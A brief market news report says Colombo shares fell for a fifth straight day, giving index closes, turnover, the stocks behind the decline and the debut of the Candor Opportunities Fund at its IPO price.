Colombo shares stretch losses for the fifth straight day

Colombo shares stretched losses for the fifth straight day on Tuesday on selling pressure triggered by weak domestic economic environment, analysts said.

The All Share Index lost 0.2 per cent to close at 6,895.19 while S&P SL 20 index lost the same amount to close at 3,651.34 on a Rs. 509 million turnover. The main index lost nearly 1.7per cent during the six post-budget sessions and the year-to-date loss is closing 6 per cent.

Today’s decline was mainly driven by the price dips in Carsons Cumberbtach, Dialog Axiata and Bukit Darah.

The debutant, Candor Opportunities Fund managed to touch a high of Rs. 10.80 during the session, but closed at the IPO price of Rs. 10.
